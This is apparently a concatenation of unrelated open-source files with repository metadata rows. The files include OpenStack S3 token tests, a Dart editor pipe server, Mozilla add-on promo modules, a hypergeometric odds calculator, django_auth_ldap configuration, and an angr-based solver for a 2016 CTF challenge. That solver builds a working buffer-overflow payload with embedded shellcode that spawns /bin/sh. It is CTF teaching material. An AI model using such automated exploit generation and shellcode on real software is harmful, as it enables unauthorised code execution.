req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_fail_to_connect_to_keystone(self):
with mock.patch.object(self.middleware, '_json_request') as o:
o.side_effect = self.middleware._deny_request('InvalidURI')
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
def test_bad_reply(self):
self.requests_mock.post(self.TEST_URL,
status_code=201,
text="<badreply>")
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
200)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
class S3TokenMiddlewareTestV3(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestV3, self).setUp()
self.requests_mock.post(self.TEST_URL,
status_code=200,
json=GOOD_RESPONSE_V3)
def _assert_authorized(self, req,
account_path='/v1/AUTH_PROJECT_ID/'):
self.assertTrue(req.path.startswith(account_path))
expected_headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': 'swift-user,_member_',
'X-User-Id': 'USER_ID',
'X-User-Name': 'S3_USER',
'X-User-Domain-Id': 'default',
'X-User-Domain-Name': 'Default',
'X-Tenant-Id': 'PROJECT_ID',
'X-Tenant-Name': 'PROJECT_NAME',
'X-Project-Id': 'PROJECT_ID',
'X-Project-Name': 'PROJECT_NAME',
'X-Project-Domain-Id': 'PROJECT_DOMAIN_ID',
'X-Project-Domain-Name': 'PROJECT_DOMAIN_NAME',
}
for header, value in expected_headers.items():
self.assertIn(header, req.headers)
self.assertEqual(value, req.headers[header])
# WSGI wants native strings for headers
self.assertIsInstance(req.headers[header], str)
self.assertNotIn('X-Auth-Token', req.headers)
self.assertEqual(1, self.middleware._app.calls)
def test_authorized(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_bytes(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': b'access',
'signature': b'signature',
'string_to_sign': b'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_http(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v2.0/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V3)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_v3(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v3/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V3)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port,
'auth_version': '3'})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_trailing_slash(self):
self.middleware = s3_token.filter_factory({
'auth_uri': self.TEST_AUTH_URI + '/'})(self.app)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorization_nova_toconnect(self):
req = Request.blank('/v1/AUTH_swiftint/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access:FORCED_TENANT_ID',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, account_path='/v1/AUTH_FORCED_TENANT_ID/')
def _test_bad_reply_missing_parts(self, *parts):
resp = copy.deepcopy(GOOD_RESPONSE_V3)
part_dict = resp
for part in parts[:-1]:
part_dict = part_dict[part]
del part_dict[parts[-1]]
self.requests_mock.post(self.TEST_URL,
status_code=201,
text=json.dumps(resp))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def test_bad_reply_missing_parts(self):
self._test_bad_reply_missing_parts('token', 'user', 'id')
self._test_bad_reply_missing_parts('token', 'user', 'name')
self._test_bad_reply_missing_parts('token', 'user', 'domain', 'id')
self._test_bad_reply_missing_parts('token', 'user', 'domain', 'name')
self._test_bad_reply_missing_parts('token', 'user', 'domain')
self._test_bad_reply_missing_parts('token', 'user')
self._test_bad_reply_missing_parts('token', 'project', 'id')
self._test_bad_reply_missing_parts('token', 'project', 'name')
self._test_bad_reply_missing_parts('token', 'project', 'domain', 'id')
self._test_bad_reply_missing_parts('token', 'project', 'domain',
'name')
self._test_bad_reply_missing_parts('token', 'project', 'domain')
self._test_bad_reply_missing_parts('token', 'project')
self._test_bad_reply_missing_parts('token', 'roles')
| apache-2.0 | 3,715,393,012,582,015,500 | 38.080183 | 79 | 0.560219 | false |
guillermooo-forks/dart-sublime-bundle | lib/analyzer/pipe_server.py | 3 | 1941 | # Copyright (c) 2014, Guillermo López-Anglada. Please see the AUTHORS file for details.
# All rights reserved. Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.)
'''Wraps a process to make it act as a pipe server. Takes care of suppressing
console windows under Windows and other housekeeping.
'''
from subprocess import Popen
from subprocess import PIPE
import threading
from Dart.sublime_plugin_lib import PluginLogger
from Dart.sublime_plugin_lib.plat import supress_window
from Dart.sublime_plugin_lib.path import pushd
_logger = PluginLogger(__name__)
class PipeServer(object):
    '''Starts a process and communicates with it via pipes.
'''
status_lock = threading.RLock()
def __init__(self, args):
self.proc = None
self.args = args
@property
def is_running(self):
'''Returns `True` if the server seems to be responsive.
'''
try:
with PipeServer.status_lock:
return not self.proc.stdin.closed
except AttributeError:
_logger.debug('PipeServer not started yet')
return
def start(self, working_dir='.'):
with PipeServer.status_lock:
if self.is_running:
_logger.debug(
'tried to start an already running PipeServer; aborting')
return
with pushd(working_dir):
_logger.debug('starting PipeServer with args: %s', self.args)
self.proc = Popen(self.args,
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
startupinfo=supress_window())
def stop(self):
_logger.debug('stopping PipeServer...')
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.kill()
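# Illustrative usage sketch (the command line and request bytes below are
# placeholders, not the analysis server this package actually launches):
#
#     server = PipeServer(['some-server', '--serve-on-stdio'])
#     server.start(working_dir='.')
#     if server.is_running:
#         server.proc.stdin.write(b'{"id": "1"}\n')
#         server.proc.stdin.flush()
#     server.stop()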
| bsd-3-clause | -4,318,954,298,407,976,400 | 31.333333 | 87 | 0.587629 | false |
lavish205/olympia | src/olympia/legacy_discovery/modules.py | 1 | 9316 | # -*- coding: utf-8 -*-
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
import jinja2
from olympia.addons.models import Addon
from olympia.bandwagon.models import (
Collection, MonthlyPick as MonthlyPickModel)
from olympia.legacy_api.views import addon_filter
from olympia.versions.compare import version_int
from olympia.lib.cache import cache_get_or_set, make_key
# The global registry for promo modules. Managed through PromoModuleMeta.
registry = {}
class PromoModuleMeta(type):
"""Adds new PromoModules to the module registry."""
def __new__(mcs, name, bases, dict_):
cls = type.__new__(mcs, name, bases, dict_)
if 'abstract' not in dict_:
registry[cls.slug] = cls
return cls
class PromoModule(object):
"""
Base class for promo modules in the discovery pane.
Subclasses should assign a slug and define render(). The slug is only used
internally, so it doesn't have to really be a slug.
"""
__metaclass__ = PromoModuleMeta
abstract = True
slug = None
def __init__(self, request, platform, version):
self.request = request
self.platform = platform
self.version = version
self.compat_mode = 'strict'
if version_int(self.version) >= version_int('10.0'):
self.compat_mode = 'ignore'
def render(self):
raise NotImplementedError
class TemplatePromo(PromoModule):
abstract = True
template = None
def context(self, **kwargs):
return {}
def render(self, **kw):
c = dict(self.context(**kw))
c.update(kw)
r = render_to_string(self.template, c, request=self.request)
return jinja2.Markup(r)
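# Illustrative sketch of how PromoModuleMeta populates the registry (this
# subclass and its template path are hypothetical, not part of the real
# module): any concrete subclass that defines a slug and omits ``abstract``
# is added to ``registry`` keyed by that slug.
#
#     class HolidayPromo(TemplatePromo):
#         slug = 'Holiday Promo'
#         template = 'legacy_discovery/modules/holiday.html'
#
#     assert registry['Holiday Promo'] is HolidayPromo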
class MonthlyPick(TemplatePromo):
slug = 'Monthly Pick'
template = 'legacy_discovery/modules/monthly.html'
def get_pick(self, locale):
monthly_pick = MonthlyPickModel.objects.filter(locale=locale)[0]
if not monthly_pick.addon.is_public():
raise IndexError
return monthly_pick
def context(self, **kwargs):
try:
monthly_pick = self.get_pick(self.request.LANG)
except IndexError:
try:
# No MonthlyPick available in the user's locale, use '' to get
# the global pick if there is one.
monthly_pick = self.get_pick('')
except IndexError:
monthly_pick = None
return {'pick': monthly_pick, 'module_context': 'discovery'}
class CollectionPromo(PromoModule):
abstract = True
template = 'legacy_discovery/modules/collection.html'
title = None
subtitle = None
cls = 'promo'
limit = 3
linkify_title = False
def __init__(self, *args, **kw):
super(CollectionPromo, self).__init__(*args, **kw)
self.collection = None
try:
self.collection = Collection.objects.get(
author__username=self.collection_author,
slug=self.collection_slug)
except Collection.DoesNotExist:
pass
def get_descriptions(self):
return {}
def get_addons(self):
addons = self.collection.addons.public()
kw = {
'addon_type': 'ALL',
'limit': self.limit,
'app': self.request.APP,
'platform': self.platform,
'version': self.version,
'compat_mode': self.compat_mode
}
def fetch_and_filter_addons():
return addon_filter(addons, **kw)
# The cache-key can be very long, let's normalize it to make sure
# we never hit the 250-char limit of memcached.
cache_key = make_key(
'collections-promo-get-addons:{}'.format(repr(kw)),
normalize=True)
return cache_get_or_set(cache_key, fetch_and_filter_addons)
def render(self, module_context='discovery'):
if module_context == 'home':
self.platform = 'ALL'
self.version = None
context = {
'promo': self,
'module_context': module_context,
'descriptions': self.get_descriptions()
}
if self.collection:
context['addons'] = self.get_addons()
return jinja2.Markup(render_to_string(
self.template, context, request=self.request))
class ShoppingCollection(CollectionPromo):
slug = 'Shopping Collection'
collection_author, collection_slug = 'mozilla', 'onlineshopping'
cls = 'promo promo-purple'
title = _(u'Shopping Made Easy')
subtitle = _(u'Save on your favorite items '
u'from the comfort of your browser.')
class WebdevCollection(CollectionPromo):
slug = 'Webdev Collection'
collection_author, collection_slug = 'mozilla', 'webdeveloper'
cls = 'webdev'
title = _(u'Build the perfect website')
class TestPilot(TemplatePromo):
slug = 'Test Pilot'
cls = 'promo promo-test-pilot'
template = 'legacy_discovery/modules/testpilot.html'
def context(self, **kwargs):
return {'module_context': 'discovery'}
class StarterPack(CollectionPromo):
slug = 'Starter Pack'
collection_author, collection_slug = 'mozilla', 'starter'
id = 'starter'
cls = 'promo'
title = _(u'First time with Add-ons?')
subtitle = _(u'Not to worry, here are three to get started.')
def get_descriptions(self):
return {
2257: _(u'Translate content on the web from and into over 40 '
'languages.'),
1833: _(u"Easily connect to your social networks, and share or "
"comment on the page you're visiting."),
11377: _(u'A quick view to compare prices when you shop online '
'or search for flights.')
}
class StPatricksPersonas(CollectionPromo):
slug = 'St. Pat Themes'
collection_author, collection_slug = 'mozilla', 'st-patricks-day'
id = 'st-patricks'
cls = 'promo'
title = _(u'St. Patrick’s Day Themes')
subtitle = _(u'Decorate your browser to celebrate '
'St. Patrick’s Day.')
class SchoolCollection(CollectionPromo):
slug = 'School'
collection_author, collection_slug = 'mozilla', 'back-to-school'
id = 'school'
cls = 'promo'
title = _(u'A+ add-ons for School')
subtitle = _(u'Add-ons for teachers, parents, and students heading back '
'to school.')
def get_descriptions(self):
return {
3456: _(u'Would you like to know which websites you can trust?'),
2410: _(u'Xmarks is the #1 bookmarking add-on.'),
2444: _(u'Web page and text translator, dictionary, and more!')
}
# The add-ons that go with the promo modal. Not an actual PromoModule
class PromoVideoCollection():
items = (349111, 349155, 349157, 52659, 5579, 252539, 11377, 2257)
def get_items(self):
items = Addon.objects.in_bulk(self.items)
return [items[i] for i in self.items if i in items]
class ValentinesDay(CollectionPromo):
slug = 'Valentines Day'
collection_author, collection_slug = 'mozilla', 'bemine'
id = 'valentines'
title = _(u'Love is in the Air')
subtitle = _(u'Add some romance to your Firefox.')
class Fitness(CollectionPromo):
slug = 'Fitness'
cls = 'promo promo-yellow'
collection_author, collection_slug = 'mozilla', 'fitness'
title = _(u'Get up and move!')
subtitle = _(u'Install these fitness add-ons to keep you active and '
u'healthy.')
class UpAndComing(CollectionPromo):
slug = 'Up & Coming'
cls = 'promo promo-blue'
collection_author, collection_slug = 'mozilla', 'up_coming'
title = _(u'New & Now')
subtitle = _(u'Get the latest, must-have add-ons of the moment.')
class Privacy(CollectionPromo):
slug = 'Privacy Collection'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'privacy'
title = _(u'Worry-free browsing')
subtitle = _(u'Protect your privacy online with the add-ons in this '
u'collection.')
class Featured(CollectionPromo):
slug = 'Featured Add-ons Collection'
cls = 'promo promo-yellow'
collection_author, collection_slug = 'mozilla', 'featured-add-ons'
title = _(u'Featured Add-ons')
subtitle = _(u'Great add-ons for work, fun, privacy, productivity… '
u'just about anything!')
class Games(CollectionPromo):
slug = 'Games!'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'games'
title = _(u'Games!')
subtitle = _(u'Add more fun to your Firefox. Play dozens of games right '
u'from your browser—puzzles, classic arcade, action games, '
u'and more!')
linkify_title = True
class MustHaveMedia(CollectionPromo):
slug = 'Must-Have Media'
cls = 'promo promo-purple'
collection_author, collection_slug = 'mozilla', 'must-have-media'
title = _(u'Must-Have Media')
subtitle = _(u'Take better screenshots, improve your online video '
u'experience, finally learn how to make a GIF, and other '
u'great media tools.')
linkify_title = True
| bsd-3-clause | -3,985,784,769,514,446,000 | 31.228374 | 79 | 0.617994 | false |
TiniKhang/cfvg-discordbot | Hyper_Calculator.py | 2 | 2773 | import math
from fractions import *
def smallernum(a,b):
'''Return the smaller of two values'''
if a < b: return a
else: return b
def Odds(a,b,d):
'''Returns probability
Parent: HGC()
Called when: sample size is 1
Why: Prevents factorials from being made, as it is unnecessary. Of course,
computers are so fast this method probably isn't necessary anyway.
'''
if d == 1: return Fraction(b,a)
else: return Fraction(a-b,a)
def P(n, r):
'''Returns nPr as a fraction'''
if (r>n): return 0
else: return Fraction(math.factorial(n),math.factorial(n - r))
def C(n, r):
'''Returns nCr as a fraction'''
if (r>n): return 0
else: return Fraction(P(n,r),math.factorial(r))
# return math.factorial(n) / (math.factorial(r) * math.factorial(n - r)
def HGC(a,b,c,d):
'''Hyper Geometric Calculator
Variables
a: Population size
    b: Possible successes
c: Sample size
d: # of successes
'''
if (b>a) | (c>a) | (d>a) | (d>c): return 0
elif c == 1: return Odds(a,b,d)
else: return Fraction(C(b,d)*C(a-b,c-d),C(a,c))
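# Worked example (illustrative): with a 40-card deck holding 4 copies of a
# target card and a 5-card hand, the chance of drawing exactly one copy is
#   HGC(40, 4, 5, 1) == Fraction(C(4, 1) * C(36, 4), C(40, 5))   # ~0.358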
def HGCC(a,b,c,d,find="="):
'''Hyper Geometric Cumulative Calculator
Calls HGC() multiple times, based on the "find" modifier
Variables
a: Population size
b: Possible successes
c: Sample size
d: # of successes
    find: modifies variable d. Available inputs: <, <=, >, >=, =
'''
if find == "<":
x = 0
for i in range(d): x += HGC(a,b,c,i)
return x
elif find == "<=":
x = 0
for i in range(d+1): x += HGC(a,b,c,i)
return x
elif find == ">":
x = 0
f = smallernum(c,b)
for i in range(d+1,f+1): x += HGC(a,b,c,i)
return x
elif find == ">=":
x = 0
f = smallernum(c,b)
for i in range(d,f+1): x += HGC(a,b,c,i)
return x
else: return HGC(a,b,c,d)
def quickodds(a,b,c,d):
'''Displays all probabilities of a given value
Calls all modifiers of HGCC()
Variables
a: Population size
b: Possible successes
c: Sample size
d: # of successes
'''
tmp = "\n"
tmp += "Chance to get exactly {}: {}\n".format(d,HGCC(a,b,c,d,find="="))
tmp += "Chance to less than {}: {}\n".format(d,HGCC(a,b,c,d,find="<"))
tmp += "Chance to get less than or equal to {}: {}\n".format(d,HGCC(a,b,c,d,find="<="))
tmp += "Chance to more than {}: {}\n".format(d,HGCC(a,b,c,d,find=">"))
tmp += "Chance to get more than or equal to {}: {}\n".format(d,HGCC(a,b,c,d,find=">="))
return tmp
def cascadeodds(a,b,c):
    '''Return exact odds for each # of successes'''
tmp = ""
for i in range(0,c+1): tmp += "Chance to get exactly {}: {}\n".format(i,HGC(a,b,c,i))
return tmp
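if __name__ == '__main__':
    # Illustrative demo only (these numbers are an example, not part of the
    # bot's command handling): odds for 4 copies in a 40-card deck, 5-card hand.
    print(quickodds(40, 4, 5, 1))
    print(cascadeodds(40, 4, 5))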
| mit | -16,031,917,814,267,832 | 27.010101 | 91 | 0.559683 | false |
Ruide/angr-dev | angr-doc/examples/secuinside2016mbrainfuzz/solve.py | 1 | 5451 | # This example is for secuinsides mbrainfuzz challenge (2016)
# The challenge gave you binaries which you automatically had
# to exploit - since the service is not online anymore, 4 example
# binaries, obtained during the ctf, are included in this example
# The script is based on the writeup at
# https://tasteless.eu/post/2016/07/secuinside-mbrainfuzz/ - the
# difference is that the static analyses part is done with angr instead of r2
import re
import sys
import angr
import claripy
import subprocess
def static_analyses(p):
print '[*] Analyzing %s...' % p.filename
#This part is done with r2 in the original writeup.
#However, it is also possible to do the same with angr! :)
to_find, to_avoid, byte_addresses = [], [], []
find_hex_re = re.compile('(0x[0-9a-fA-F]{6})')
#Our main interface for this part will be the cfg. For performance reasons, we use CFGFast
cfg = p.analyses.CFGFast()
#As the main function doesn't get identified automatically, let's use a small trick here:
#We take a function which is only called in main (e.g. sscanf) and resolve its predecessor
for address,function in cfg.functions.iteritems():
if function.name == '__isoc99_sscanf' and function.is_plt:
addr = cfg.functions.callgraph.predecessors(address)[0]
break
#Now, let's go down all the way to the target function
while True:
function = cfg.functions[addr]
#First, let's get all call_sites and leave the loop, if there are none
call_sites = function.get_call_sites()
if not len(call_sites):
break
#Now, Let's get the address of the basic block calling the next target function.
#The sorting and indexing is only relevant for the main function.
calling_block_addr = sorted(call_sites)[-1]
#Resolve the target addr
addr = function.get_call_target(calling_block_addr)
#Since we are already on it, let's apply a dirty heuristic to populate the to_avoid list
#This works because the returning block from the function is at a fixed offset after the call
#We could also develop a cleaner solution if we wouldn't use CFGFast() - but this would slow us down
avoid = function.get_call_return(calling_block_addr) + 3
#Last but not least, let's get the addresses of the processed bytes
calling_block = p.factory.block(calling_block_addr)
local_addresses = []
for ins in calling_block.capstone.insns:
m = re.search(find_hex_re,ins.op_str)
if ins.insn_name() == 'movzx' and m:
#The bytes are fetched via rip-relative addressing
local_addresses.append(int(m.group(),16) + ins.size + ins.address)
to_find.append(addr)
to_avoid.append(avoid)
byte_addresses.append(local_addresses)
return to_find, to_avoid, byte_addresses
#pylint:disable=redefined-builtin
def generate_input(p, to_find, to_avoid, byte_addresses):
print '[*] Generating input ....'
input = {}
for i in range(0,len(to_find)-1):
f = to_find[i]
t = to_find[i+1]
#Set up the state for the function we want to solve
e = p.factory.entry_state(addr=f)
rdi = claripy.BVS('rdi', 64)
rsi = claripy.BVS('rsi', 64)
rdx = claripy.BVS('rdx', 64)
rcx = claripy.BVS('rcx', 64)
e.regs.rdi = rdi
e.regs.rsi = rsi
e.regs.rdx = rdx
e.regs.rcx = rcx
#Generate a SimulationManager out of this state and explore
sm = p.factory.simgr(e)
sm.explore(find=t,avoid=to_avoid)
#Save the solutions
found = sm.found[0]
address_local = byte_addresses[i]
input[address_local[3]] = found.se.eval(rdi)
input[address_local[2]] = found.se.eval(rsi)
input[address_local[1]] = found.se.eval(rdx)
input[address_local[0]] = found.se.eval(rcx)
return input
def format_input(input):
res = ''
for i in input:
res += "%02x" % input[i]
return res
def generate_exploit(input):
print '[*] Crafting final exploit'
#In essence, the magic consists of:
# - static padding between input and the memcpy'ed buffer
# - padding from start of this buffer up to the location of the saved return address
# - the address of the shellcode
# - customized shellcode for '/bin/sh -c "echo SUCCESS"'
#For more details of the magic, please check the writeup linked above
magic = '424242424242424242424141414141414141414141414141414141414141414141412e626000000000006563686f20275355434345535327004141414141414141414141414141414141414141414141414141414141414141412f62696e2f7368002d630000000000004831c050b8ee61600050b82662600050b81e626000504889e64889c74831d2b83b0000000f05'
exploit = input + magic
return exploit
def main(binary):
p = angr.Project(binary)
(to_find, to_avoid, byte_addresses) = static_analyses(p)
input = generate_input(p, to_find, to_avoid, byte_addresses)
exploit = generate_exploit(format_input(input))
print '[+] Exploit generated!'
print '[!] Please run `%s %s`' % (binary,exploit)
return exploit
def test():
binaries = ['./sample_1','./sample_2','./sample_3','./sample_4']
for b in binaries:
p = main(b)
assert subprocess.check_output([b,p]) == 'SUCCESS\n'
if __name__ == '__main__':
main(sys.argv[1])
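# Usage sketch (sample binaries are the ones referenced in test() above; the
# exploit argument is whatever main() prints for that binary):
#
#     $ python solve.py ./sample_1
#     [*] Analyzing ./sample_1...
#     [*] Generating input ....
#     [*] Crafting final exploit
#     [+] Exploit generated!
#     [!] Please run `./sample_1 <hex input + magic payload>`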
| bsd-2-clause | 3,890,985,157,817,336,300 | 35.831081 | 302 | 0.659695 | false |
janus-ets/django-auth-ldap3 | django_auth_ldap/config.py | 2 | 22852 | # Copyright (c) 2009, Peter Sagerson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes that will be needed for configuration of LDAP
authentication. Unlike backend.py, this is safe to import into settings.py.
Please see the docstring on the backend module for more information, including
notes on naming conventions.
"""
import ldap
import logging
import pprint
try:
from django.utils.encoding import force_str
except ImportError: # Django < 1.5
from django.utils.encoding import smart_str as force_str
class _LDAPConfig(object):
"""
A private class that loads and caches some global objects.
"""
ldap = None
logger = None
_ldap_configured = False
def get_ldap(cls, global_options=None):
"""
Returns the ldap module. The unit test harness will assign a mock object
to _LDAPConfig.ldap. It is imperative that the ldap module not be
imported anywhere else so that the unit tests will pass in the absence
of python-ldap.
"""
if cls.ldap is None:
import ldap.filter
# Support for python-ldap < 2.0.6
try:
import ldap.dn
except ImportError:
from django_auth_ldap import dn
ldap.dn = dn
cls.ldap = ldap
# Apply global LDAP options once
if (not cls._ldap_configured) and (global_options is not None):
for opt, value in global_options.items():
cls.ldap.set_option(opt, value)
cls._ldap_configured = True
return cls.ldap
get_ldap = classmethod(get_ldap)
def get_logger(cls):
"""
Initializes and returns our logger instance.
"""
if cls.logger is None:
class NullHandler(logging.Handler):
def emit(self, record):
pass
cls.logger = logging.getLogger('django_auth_ldap')
cls.logger.addHandler(NullHandler())
return cls.logger
get_logger = classmethod(get_logger)
# Our global logger
logger = _LDAPConfig.get_logger()
class LDAPSearch(object):
"""
Public class that holds a set of LDAP search parameters. Objects of this
class should be considered immutable. Only the initialization method is
documented for configuration purposes. Internal clients may use the other
methods to refine and execute the search.
"""
def __init__(self, base_dn, scope, filterstr=u'(objectClass=*)'):
"""
These parameters are the same as the first three parameters to
ldap.search_s.
"""
self.base_dn = base_dn
self.scope = scope
self.filterstr = filterstr
self.ldap = _LDAPConfig.get_ldap()
def search_with_additional_terms(self, term_dict, escape=True):
"""
Returns a new search object with additional search terms and-ed to the
filter string. term_dict maps attribute names to assertion values. If
you don't want the values escaped, pass escape=False.
"""
term_strings = [self.filterstr]
for name, value in term_dict.items():
if escape:
value = self.ldap.filter.escape_filter_chars(value)
term_strings.append(u'(%s=%s)' % (name, value))
filterstr = u'(&%s)' % ''.join(term_strings)
return self.__class__(self.base_dn, self.scope, filterstr)
def search_with_additional_term_string(self, filterstr):
"""
Returns a new search object with filterstr and-ed to the original filter
string. The caller is responsible for passing in a properly escaped
string.
"""
filterstr = u'(&%s%s)' % (self.filterstr, filterstr)
return self.__class__(self.base_dn, self.scope, filterstr)
def execute(self, connection, filterargs=(), escape=True):
"""
Executes the search on the given connection (an LDAPObject). filterargs
is an object that will be used for expansion of the filter string.
If escape is True, values in filterargs will be escaped.
The python-ldap library returns utf8-encoded strings. For the sake of
sanity, this method will decode all result strings and return them as
Unicode.
"""
if escape:
filterargs = self._escape_filterargs(filterargs)
try:
filterstr = self.filterstr % filterargs
results = connection.search_s(force_str(self.base_dn),
self.scope,
force_str(filterstr))
except ldap.LDAPError as e:
results = []
logger.error(u"search_s('%s', %d, '%s') raised %s" %
(self.base_dn, self.scope, filterstr, pprint.pformat(e)))
return self._process_results(results)
def _begin(self, connection, filterargs=(), escape=True):
"""
Begins an asynchronous search and returns the message id to retrieve
the results.
filterargs is an object that will be used for expansion of the filter
string. If escape is True, values in filterargs will be escaped.
"""
if escape:
filterargs = self._escape_filterargs(filterargs)
try:
filterstr = self.filterstr % filterargs
msgid = connection.search(force_str(self.base_dn),
self.scope, force_str(filterstr))
except ldap.LDAPError as e:
msgid = None
logger.error(u"search('%s', %d, '%s') raised %s" %
(self.base_dn, self.scope, filterstr, pprint.pformat(e)))
return msgid
def _results(self, connection, msgid):
"""
Returns the result of a previous asynchronous query.
"""
try:
kind, results = connection.result(msgid)
if kind != ldap.RES_SEARCH_RESULT:
results = []
except ldap.LDAPError as e:
results = []
logger.error(u"result(%d) raised %s" % (msgid, pprint.pformat(e)))
return self._process_results(results)
def _escape_filterargs(self, filterargs):
"""
Escapes values in filterargs.
filterargs is a value suitable for Django's string formatting operator
(%), which means it's either a tuple or a dict. This return a new tuple
or dict with all values escaped for use in filter strings.
"""
if isinstance(filterargs, tuple):
filterargs = tuple(self.ldap.filter.escape_filter_chars(value)
for value in filterargs)
elif isinstance(filterargs, dict):
filterargs = dict((key, self.ldap.filter.escape_filter_chars(value))
for key, value in filterargs.items())
else:
raise TypeError("filterargs must be a tuple or dict.")
return filterargs
def _process_results(self, results):
"""
Returns a sanitized copy of raw LDAP results. This scrubs out
references, decodes utf8, normalizes DNs, etc.
"""
results = [r for r in results if r[0] is not None]
results = _DeepStringCoder('utf-8').decode(results)
# The normal form of a DN is lower case.
results = [(r[0].lower(), r[1]) for r in results]
result_dns = [result[0] for result in results]
logger.debug(u"search_s('%s', %d, '%s') returned %d objects: %s" %
(self.base_dn, self.scope, self.filterstr, len(result_dns),
"; ".join(result_dns)))
return results
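# Typical settings-level usage of LDAPSearch (illustrative; the base DN and
# filter below are placeholders, not defaults of this module):
#
#     import ldap
#     AUTH_LDAP_USER_SEARCH = LDAPSearch("ou=users,dc=example,dc=com",
#                                        ldap.SCOPE_SUBTREE,
#                                        "(uid=%(user)s)")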
class LDAPSearchUnion(object):
"""
A compound search object that returns the union of the results. Instantiate
it with one or more LDAPSearch objects.
"""
def __init__(self, *args):
self.searches = args
self.ldap = _LDAPConfig.get_ldap()
def search_with_additional_terms(self, term_dict, escape=True):
searches = [s.search_with_additional_terms(term_dict, escape)
for s in self.searches]
return self.__class__(*searches)
def search_with_additional_term_string(self, filterstr):
searches = [s.search_with_additional_term_string(filterstr)
for s in self.searches]
return self.__class__(*searches)
def execute(self, connection, filterargs=()):
msgids = [search._begin(connection, filterargs) for search in self.searches]
results = {}
